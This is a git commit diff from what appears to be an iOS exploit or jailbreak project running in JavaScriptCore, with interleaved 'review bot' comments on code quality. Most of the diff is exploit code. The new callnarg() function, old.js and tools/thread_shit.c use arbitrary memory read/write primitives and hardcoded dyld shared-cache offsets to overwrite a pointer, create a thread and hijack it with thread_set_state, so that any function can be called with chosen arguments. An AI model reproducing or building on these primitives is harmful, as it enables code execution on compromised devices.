authorspv420 <unomilliono@gmail.com>2022-04-24 05:57:07 -0400
committerspv420 <unomilliono@gmail.com>2022-04-24 05:57:07 -0400
commiteab6e28c9e1b541c505e84ab64a148d6def984c9 (patch)
tree8df4adfd893cfa14755b7f158817148bed94c79b
parent36dd71290d6a4b7757adb9bbe59f876ada4cc6b8 (diff)
get rekt ios - as many fucking args as you want (need to work on return still, it'll run in a seperate thread rn async)
-rw-r--r--old.js70
-rw-r--r--src/js/main.js55
-rw-r--r--src/js/primitives/call.js60
-rw-r--r--tools/thread_shit.c25
4 files changed, 146 insertions, 64 deletions
diff --git a/old.js b/old.js
new file mode 100644
index 0000000..2dd0509
--- /dev/null
+++ b/old.js
@@ -0,0 +1,70 @@
+var dyld_shc_slide = get_dyld_shc_slide();
+
+ printf("still alive0\n");
+ write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
+ printf("still alive1\n");
+ write_u32(stack_shit + 0x0, 0x42069);
+ printf("still alive2\n");
+ write_u32(stack_shit + 0x1, 0x69420);
+ printf("still alive3\n");
+ write_u32(stack_shit + 0x2, 0x13371337);
+ printf("still alive4\n");
+ write_u32(stack_shit + 0x3, 0x6969);
+ printf("still alive5\n");
+
+ printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+ calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
+ printf("%x\n", read_u32(threadptr));
+ thread = read_u32(threadptr);
+ calls4arg("usleep", 100000, 0, 0, 0);
+ printf("%s\n", prim_hexdump(read_buf(thread, 0x100)));
+// call4arg(0x41414141, 0, 0, 0, 0);
+ printf("still alive6\n");
+ write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+// write_u32(th, 0xa03);
+ printf("thread=%x th=%x sym=%x\n", read_u32(thread), read_u32(th), sym_cache["pthread_mach_thread_np"]);
+
+ var info = 0x134004;
+ var whatever = 0x134000;
+
+ /*
+ var lol = new Uint8Array(0x100);
+
+ for (i = 0; i < 0x10000; i++) {
+ write_buf(info, lol, 0x100);
+ write_u32(whatever, 0x100)
+// printf("%x\n", calls4arg("mach_thread_self", 0, 0, 0, 0));
+ calls4arg("thread_info", i, 3, info, whatever);
+// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+ if (read_u32(info) != 0) {
+// printf("%s\n", prim_hexdump(read_buf(info, 0x100)));
+ printf("hit: %x\n", i);
+ } else if (i % 0x10 == 0) {
+ printf("%x\n", i);
+ }
+ }*/
+
+ printf("still alive7\n");
+ write_u32(thread_state + (0 << 2), sptr("Hello, world! %x %x %x %x %x %x %x\n"));
+ printf("still alive8\n");
+ write_u32(thread_state + (1 << 2), 0x1337);
+ printf("still alive9\n");
+ write_u32(thread_state + (2 << 2), 0x420);
+ printf("still alive10\n");
+ write_u32(thread_state + (3 << 2), 0x69);
+ printf("still alive11\n");
+ write_u32(thread_state + (13 << 2), stack_shit);
+ printf("still alive12\n");
+ write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
+ printf("still alive13\n");
+ write_u32(thread_state + (15 << 2), sym_cache["printf"]);
+ printf("still alive14\n");
+ write_u32(thread_state + (16 << 2), 0x40000020);
+
+ printf("still alive15\n");
+ printf("%d\n", calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT));
+ printf("still alive16\n");
+ printf("%d\n", calls4arg("thread_resume", read_u32(th), 0, 0, 0));
+ printf("still alive17\n");
+
+ calls4arg("sleep", 10, 0, 0, 0); \ No newline at end of file
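Review bot: old.js is added at the repository root as a bare run of statements that use names defined nowhere in the file (`stack_shit`, `thread`, `threadptr`, `th`, `thread_state`), so it cannot run on its own, and nothing else in this commit loads it. If it is meant as a record of the flow that `callnarg` now replaces, a one-line header such as `// superseded by callnarg() in src/js/primitives/call.js; kept for reference only` and a home under tools/ would say so; otherwise the history already preserves it and the tree does not need it. The file also lacks a trailing newline.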
diff --git a/src/js/main.js b/src/js/main.js
index d611329..683c96a 100644
--- a/src/js/main.js
+++ b/src/js/main.js
@@ -12,13 +12,13 @@ var ARM_THREAD_STATE = 0x1;
var ARM_THREAD_STATE_COUNT = 0x11;
try {
- log("we out here in jsc");
+ puts("we out here in jsc");
} catch (e) {
/*
- * we don't have log. :(
+ * we don't have puts. :(
*/
- log = function (){};
+ puts = function (){};
}
function main() {
@@ -34,29 +34,11 @@ function main() {
slide = get_our_slide();
base = 0x4000 + (slide << 12);
slid = (slide << 12);
- mytask = 0;
- count = 0x130000;
- th = 0x130100;
-// thread_state_ptr = 0x130008;
- thread_state = 0x130200;
- countptr = 0x131000;
- thptr = 0x131004;
- thread_stateptr = 0x131008;
-
- countptrptr = 0x132000;
- thptrptr = 0x132004;
- thread_stateptrptr = 0x132008;
-
- write_u32(countptr, count);
- write_u32(thptr, th);
- write_u32(thread_stateptr, thread_state);
-
- write_u32(countptrptr, countptr);
- write_u32(thptrptr, thptr);
- write_u32(thread_stateptrptr, thread_stateptr);
init_sptr_heap();
+ var i = 0;
+
puts("we out here");
puts("I came through a portal holding a 40 and a blunt. Do you really wanna test me right now?");
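Review bot: `var i = 0;` added after `init_sptr_heap();` is never read in what remains of `main()` — the `for` loop that used `i` is deleted in this same hunk, and the only other reference is inside the commented-out block further down, which carries its own `// var i = 0;`. Drop the new declaration. `main()` starts before this hunk and continues past it.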
@@ -65,35 +47,14 @@ function main() {
printf("*(uint16_t*)base = 0x%x\n", read_u16(base));
printf("*(uint32_t*)base = 0x%x\n", read_u32(base));
- puts("alive");
- mytask = calls4arg("mach_task_self", 0, 0, 0, 0);
-
- printf("%x %x %x\n", mytask, thptr, th);
- printf("%x %x\n", thread_stateptr, countptr);
-
- puts("alive");
- calls4arg("thread_create", mytask, th, 0, 0);
- printf("mytask=%x th=%x\n", mytask, read_u32(th));
- puts("alive");
- calls4arg("thread_get_state", thptr, ARM_THREAD_STATE, thread_stateptrptr, countptr);
- printf("thread_state=%x\n", read_u32(thread_state));
- puts("alive");
- for (var i = 0; i < 16; i++) {
- write_u32(thread_state + (i << 2), 0x41414140 + i);
- }
- printf("thread_state=%x\n", read_u32(thread_state));
- puts("alive");
- calls4arg("thread_set_state", thptr, ARM_THREAD_STATE, thread_stateptrptr, ARM_THREAD_STATE_COUNT);
- puts("alive");
- calls4arg("thread_resume", thptr, 0, 0, 0);
- puts("alive");
+ callnarg(sym_cache["printf"], sptr("Hello world! %x %x %x %x %x %x %x %x %x %x %x %x %x\n"), 0x420, 0x69, 0x1337, 0x13371337, 0xb1a7e17, 0x41424344);
// var i = 0;
// while (true) {
-// calls4arg("syslog", 0x28, sptr("get rekt from jsc %d (slide=%x)\n"), i, slide);
+// calls4arg("sysputs", 0x28, sptr("get rekt from jsc %d (slide=%x)\n"), i, slide);
// calls4arg("sleep", 1, 0, 0, 0);
// i++;
// }
- log("still alive");
+ printf("still alive18\n");
};
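Review bot: The blanket `log`→`puts` replace also rewrote the symbol name inside the commented-out block, turning `calls4arg("syslog", 0x28, ...)` into `calls4arg("sysputs", 0x28, ...)`; `sysputs` is not a libc symbol, so that block would fail the moment it is uncommented — restore `"syslog"`. On the new `callnarg(sym_cache["printf"], ...)` line the format string carries thirteen `%x` conversions but only six values follow it, so printf consumes seven arguments that were never supplied; trim the format to six conversions or pass a value for each. `main()` starts before this hunk.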
diff --git a/src/js/primitives/call.js b/src/js/primitives/call.js
index 996f5a8..687e758 100644
--- a/src/js/primitives/call.js
+++ b/src/js/primitives/call.js
@@ -97,3 +97,63 @@ function calls4arg(sym, r0, r1, r2, r3) {
}
return call4arg(addy, r0, r1, r2, r3);
}
+
+function callnarg() {
+ if (arguments.length < 1) {
+ return printf("error: tried to run callnarg without args. arguments.length=%d\n", arguments.length);
+ }
+
+ mytask = 0;
+ count = 0x130000;
+ th = 0x130100;
+// thread_state_ptr = 0x130008;
+ thread_state = 0x130200;
+ countptr = 0x131000;
+ thptr = 0x131004;
+ thread_stateptr = 0x131008;
+ thread = 0x130300;
+ threadptr = 0x132300;
+ threadptrptr = 0x133300;
+
+ countptrptr = 0x132000;
+ thptrptr = 0x132004;
+ thread_stateptrptr = 0x132008;
+
+ var stack_shit = 0x161000;
+
+ write_u32(countptr, count);
+ write_u32(thptr, th);
+ write_u32(threadptr, thread);
+ write_u32(thread_stateptr, thread_state);
+
+ write_u32(countptrptr, countptr);
+ write_u32(thptrptr, thptr);
+ write_u32(threadptrptr, threadptr);
+ write_u32(thread_stateptrptr, thread_stateptr);
+
+ var addy = arguments[0];
+
+ var dyld_shc_slide = get_dyld_shc_slide();
+
+ write_u32(0x346afc48 + dyld_shc_slide, 0x23d751fc + dyld_shc_slide);
+
+ calls4arg("pthread_create", threadptr, 0, 0x23d751fc + dyld_shc_slide, 0);
+ var thread = read_u32(threadptr);
+ write_u32(th, calls4arg("pthread_mach_thread_np", thread, 0, 0, 0));
+
+ for (var i = 1; i < arguments.length; i++) {
+ if (i <= 4) {
+ write_u32(thread_state + ((i - 1) << 2), arguments[i]);
+ } else {
+ write_u32(stack_shit + ((i - 5) << 2), arguments[i]);
+ }
+ }
+
+ write_u32(thread_state + (13 << 2), stack_shit);
+ write_u32(thread_state + (14 << 2), 0x23d751fc + dyld_shc_slide);
+ write_u32(thread_state + (15 << 2), addy);
+ write_u32(thread_state + (16 << 2), 0x40000020);
+
+ calls4arg("thread_set_state", read_u32(th), ARM_THREAD_STATE, thread_state, ARM_THREAD_STATE_COUNT);
+ calls4arg("thread_resume", read_u32(th), 0, 0, 0);
+} \ No newline at end of file
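Review bot: `var thread = read_u32(threadptr);` is hoisted to the top of `callnarg`, so the earlier bare `thread = 0x130300;` and the `write_u32(threadptr, thread);` that follows operate on the same local, which is then overwritten with the value read back — one name serves as both the slot address and its contents. Give the slot its own name, e.g. `var thread_slot = 0x130300;` and `write_u32(threadptr, thread_slot);`, and keep `thread` for the read-back value. The other bare assignments (`mytask`, `count`, `th`, `thread_state`, `countptr`, `thptr`, `thread_stateptr`, `threadptr`, `threadptrptr`, `countptrptr`, `thptrptr`, `thread_stateptrptr`) create implicit globals; `mytask = 0;` is never referenced again, and the `count`/`thptr`/`thread_stateptr` chains and their `*ptrptr` slots are filled in but, as far as this hunk shows, never handed to any call — they look carried over from the block deleted in src/js/main.js, and the addresses that are used would read better as `var` locals or named constants at module scope. The function also has no header comment; `// callnarg(addr, ...args): arguments[0] is the address to call, arguments[1..] are its arguments` would state the contract, and the early `return printf(...)` on the no-argument path hands back printf's result, which a caller cannot tell apart from a normal return.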
diff --git a/tools/thread_shit.c b/tools/thread_shit.c
index 1ed9921..cbfbe23 100644
--- a/tools/thread_shit.c
+++ b/tools/thread_shit.c
@@ -17,6 +17,9 @@ int main(int argc, char* argv[]) {
kern_return_t kr;
thread_t th;
mach_port_name_t mytask, mythread;
+ arm_thread_state_t state;
+ mach_msg_type_number_t count;
+
printf("Hello, world!\n");
mytask = mach_task_self();
mythread = mach_thread_self();
@@ -30,32 +33,21 @@ int main(int argc, char* argv[]) {
pthread_create(&thread, NULL, lol2, NULL);
puts("test");
+ printf("%x %x\n", &thread, thread);
-// thread_create(mytask, &th);
th = pthread_mach_thread_np(thread);
- printf("%x\n", mytask);
- arm_thread_state_t state;
- mach_msg_type_number_t count;
kr = thread_get_state(mythread, ARM_THREAD_STATE, (thread_state_t)&state, &count);
+ printf("%x\n", THREAD_BASIC_INFO);
+
+ printf("%x\n", th);
+
uint32_t* stack_above = 0x2001000;
stack_above[0] = 0x42069;
stack_above[1] = 0x69420;
stack_above[3] = 0x13371337;
stack_above[4] = 0x6969;
-// fprintf(stderr, "%p %p\n", test, dlsym(RTLD_DEFAULT, "puts"));
-
-// exit(42);
-
-// *(uint32_t*)0x41414141 = 0;
-
-// memset(&state, 0, ARM_THREAD_STATE_COUNT * sizeof(uint32_t));
-
- for (int i = 0; i < 13; i++) {
- fprintf(stderr, "r%d=%x\n", i, state.__r[i]);
- }
-
*(uint32_t*)(0x346afc48 + 0x1b4c000) = 0x23d751fc + 0x1b4c000;
state.__r[0] = test;
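Review bot: `printf("%x %x\n", &thread, thread);` passes a `pthread_t *` and a `pthread_t` to `%x`, which expects `unsigned int`; that only works where pointers happen to be 32 bits wide and is undefined behaviour otherwise, so print them as `printf("%p %p\n", (void *)&thread, (void *)thread);`. The `count` passed to `thread_get_state` a few lines later is declared in the previous hunk but never initialised, and that argument is in/out — on entry it must hold the capacity of the state buffer — so declare it as `mach_msg_type_number_t count = ARM_THREAD_STATE_COUNT;`. `kr` receives the result of `thread_get_state` but is not examined before `state` is used. `main()` starts before this hunk and continues past it.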
@@ -68,7 +60,6 @@ int main(int argc, char* argv[]) {
state.__cpsr = 0x40000020;
kr = thread_set_state(th, ARM_THREAD_STATE, (thread_state_t)&state, ARM_THREAD_STATE_COUNT);
kr = thread_resume(th);
-// thread_call_enter((thread_call_func_t)&lol);
sleep(1);